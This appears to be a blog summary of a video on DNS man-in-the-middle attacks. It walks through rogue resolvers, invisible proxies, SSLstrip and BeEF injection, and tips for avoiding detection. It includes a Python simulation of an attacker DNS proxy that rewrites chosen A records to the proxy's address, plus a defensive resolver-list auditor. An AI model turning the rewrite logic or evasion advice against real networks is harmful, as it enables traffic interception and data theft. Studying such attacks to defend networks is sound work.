A screenshot from the following YouTube video (below) by Leonardo Nve:
This is an instructive video on how DNS can be hacked and attacked; if the attack succeeds, an attacker's proxy system can embed itself into the company's web traffic.
Notice (in the screenshot) the evil proxy server that has placed itself in your DNS traffic, using the methods described in the early part of the video: Metasploit, DNSMasq and a BIND server.
Then an invisible proxy is set up with Burp Suite, mitmproxy or SSLstrip; HTML is injected with BeEF and exploit kits; SSLsplit is used to bounce to known servers; and a fake web server is set up by defacing or phishing.
The proxy can sniff data and capture network traffic, especially traffic that is not encrypted.
If the attacker does not want to be detected, the following need to be kept in mind:
He (Leonardo) also discusses HSTS (HTTP Strict Transport Security), which he presents as a non-critical item as far as the attacker being found out is concerned.
An SSH signature failure could be a critical problem, especially a banner mismatch, because the resulting errors are obvious to a user attempting to connect.
Limitations of this method: only a limited number of hosts can be intercepted, the time needed to study the IP communication matters, and only limited clear-text procedures can be captured.
How is he attacking? By abusing the DNS features of high availability and load balancing: a client is normally configured with several resolvers, and its queries can be served by any of them.
For example, he shows that a lookup for a Google name can go to any of five DNS servers.
The flow is as follows.
The victim asks the router for a DNS server address.
The router hands back the attacker's (fake) DNS server IP.
The victim sends its DNS A query to the attacker's DNS proxy, and the attacker's proxy forwards the name to the real DNS server.
The real DNS server returns the correct response containing the real server's IP address.
At this point Burp Suite is started and configured as an invisible proxy; this is how the network traffic can be sniffed.
This is not an easy hack, but it can be done if one can insert the attacking DNS server into the router's initial DNS handout, or modify the DNS tables to add the attacking server as a secondary server.
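To make the flow above concrete, here is an added example (my own code, not from the video and not from dns2proxy) that models the attacker's DNS proxy entirely in memory: it parses the victim's A query in DNS wire format, obtains the answer from a simulated real DNS server, and, for the names the attacker wants to intercept, rewrites the A record to the proxy's own address while remembering the real address so that the invisible proxy knows where to relay the connection. The addresses, names and intercept set are constructed for the example, and the rewrite-to-self step is my assumption about how such a DNS proxy feeds an invisible proxy; the notes above only say that the query passes through it.

```python
import socket
import struct

# All addresses and names below are constructed for this example; they are not
# from the video or from dns2proxy.
PROXY_IP = "10.0.0.66"                      # where the invisible proxy (e.g. Burp) listens
INTERCEPT = {"www.example.com."}            # names the attacker chooses to intercept
UPSTREAM_ZONE = {                           # stand-in for the real DNS server's data
    "www.example.com.": ["93.184.216.34"],
    "mail.example.com.": ["192.0.2.25"],
}


def encode_name(name):
    """Encode 'www.example.com.' as DNS wire-format labels."""
    out = b""
    for label in name.rstrip(".").split("."):
        out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00"


def decode_name(msg, off):
    """Decode a possibly compressed name; return (name, offset just past it)."""
    labels, end = [], None
    while True:
        length = msg[off]
        if length & 0xC0 == 0xC0:           # compression pointer (RFC 1035 section 4.1.4)
            if end is None:
                end = off + 2
            off = ((length & 0x3F) << 8) | msg[off + 1]
            continue
        off += 1
        if length == 0:
            break
        labels.append(msg[off:off + length].decode("ascii"))
        off += length
    return ".".join(labels) + ".", (end if end is not None else off)


def build_query(txid, qname, qtype=1):
    """A standard recursive A query, as the victim would send it."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    return header + encode_name(qname) + struct.pack("!HH", qtype, 1)


def upstream_answer(query):
    """Simulate the real DNS server answering from UPSTREAM_ZONE."""
    txid = struct.unpack("!H", query[:2])[0]
    qname, off = decode_name(query, 12)
    qtype, _qclass = struct.unpack("!HH", query[off:off + 4])
    ips = UPSTREAM_ZONE.get(qname, []) if qtype == 1 else []
    msg = struct.pack("!HHHHHH", txid, 0x8180, 1, len(ips), 0, 0) + query[12:off + 4]
    for ip in ips:
        # owner name = pointer to the question name at offset 12; type A, class IN, TTL 60, 4 bytes
        msg += b"\xC0\x0C" + struct.pack("!HHIH", 1, 1, 60, 4) + socket.inet_aton(ip)
    return msg


def iter_answers(msg):
    """Yield (owner name, rtype, rdata offset, rdlen) for each answer RR."""
    qdcount, ancount = struct.unpack("!HH", msg[4:8])
    off = 12
    for _ in range(qdcount):
        _, off = decode_name(msg, off)
        off += 4                            # skip QTYPE + QCLASS
    for _ in range(ancount):
        name, off = decode_name(msg, off)
        rtype, _rclass, _ttl, rdlen = struct.unpack("!HHIH", msg[off:off + 10])
        off += 10
        yield name, rtype, off, rdlen
        off += rdlen


def a_records(msg):
    """List (name, ip) for the A records in a response."""
    return [(name, socket.inet_ntoa(msg[off:off + rdlen]))
            for name, rtype, off, rdlen in iter_answers(msg) if rtype == 1 and rdlen == 4]


def rewrite_answers(response, proxy_ip, real_ips):
    """Replace the A rdata of intercepted names with proxy_ip, remembering the real
    address in real_ips so the invisible proxy knows where to relay the connection."""
    out = bytearray(response)
    for name, rtype, off, rdlen in iter_answers(response):
        if rtype == 1 and rdlen == 4 and name in INTERCEPT:
            real_ips.setdefault(name, []).append(socket.inet_ntoa(response[off:off + 4]))
            out[off:off + 4] = socket.inet_aton(proxy_ip)
    return bytes(out)


def dns_proxy(query, real_ips):
    """One round of the attacker's DNS proxy: forward upstream, then rewrite."""
    return rewrite_answers(upstream_answer(query), PROXY_IP, real_ips)


if __name__ == "__main__":
    real = {}
    for name in ("www.example.com.", "mail.example.com."):
        resp = dns_proxy(build_query(0x1234, name), real)
        print(name, "->", a_records(resp), "| real:", real.get(name))
```

The transaction ID and the question section are copied from the victim's own query, so the rewritten reply is accepted by the stub resolver exactly as a genuine one would be; names outside the intercept set pass through unchanged, which is what keeps the victim's other traffic working and the attack quiet.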
His tool is at https://github.com/LeonardoNve/dns2proxy
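Since the precondition of the attack is getting the attacking server listed as an extra resolver, a defender-side check is to audit the resolver list on hosts. The following is an added example (mine, not from the video or from dns2proxy): it parses a resolv.conf-style file, flags any nameserver that is not on an allow-list, and warns when options rotate is set, because with rotate every listed server receives a share of the queries, whereas without it a second server only sees traffic after the first one times out. The allow-list and the sample file are constructed for the example; the sample deliberately contains an unexpected second server.

```python
import ipaddress
import os
import sys

# Hypothetical allow-list: the resolvers this network is supposed to hand out (constructed).
ALLOWED_RESOLVERS = {"192.0.2.53", "192.0.2.54"}

# Constructed sample resolv.conf with an extra, unexpected secondary server.
SAMPLE_RESOLV_CONF = """\
# Generated by NetworkManager
search corp.example
nameserver 192.0.2.53
nameserver 198.51.100.9
options rotate timeout:1
"""


def parse_resolv_conf(text):
    """Return (ordered list of nameserver addresses, set of option tokens)."""
    servers, options = [], set()
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].split(";", 1)[0].strip()   # drop comments
        if not line:
            continue
        parts = line.split()
        if parts[0] == "nameserver" and len(parts) >= 2:
            try:
                servers.append(str(ipaddress.ip_address(parts[1])))
            except ValueError:
                servers.append(parts[1])    # keep a malformed entry visible to the auditor
        elif parts[0] == "options":
            options.update(parts[1:])
    return servers, options


def audit_resolvers(text, allowed):
    """List human-readable findings; an empty list means the resolver set looks clean."""
    servers, options = parse_resolv_conf(text)
    findings = []
    for idx, ip in enumerate(servers, start=1):
        if ip not in allowed:
            findings.append(f"nameserver #{idx} {ip} is not an approved resolver")
    if "rotate" in options and len(servers) > 1:
        findings.append("options rotate is set: queries are spread across all listed "
                        "servers, so an extra server sees a share of every lookup")
    return findings


if __name__ == "__main__":
    # Audit the live file when present, otherwise the constructed sample.
    path = "/etc/resolv.conf"
    text = open(path).read() if os.path.exists(path) else SAMPLE_RESOLV_CONF
    problems = audit_resolvers(text, ALLOWED_RESOLVERS)
    for p in problems:
        print("WARNING:", p)
    sys.exit(1 if problems else 0)
```

On hosts where the file is managed by systemd-resolved or a VPN client the live list may live elsewhere, so treat this as the pattern for the check rather than the only place to look; the same allow-list comparison applies to whatever the router hands out.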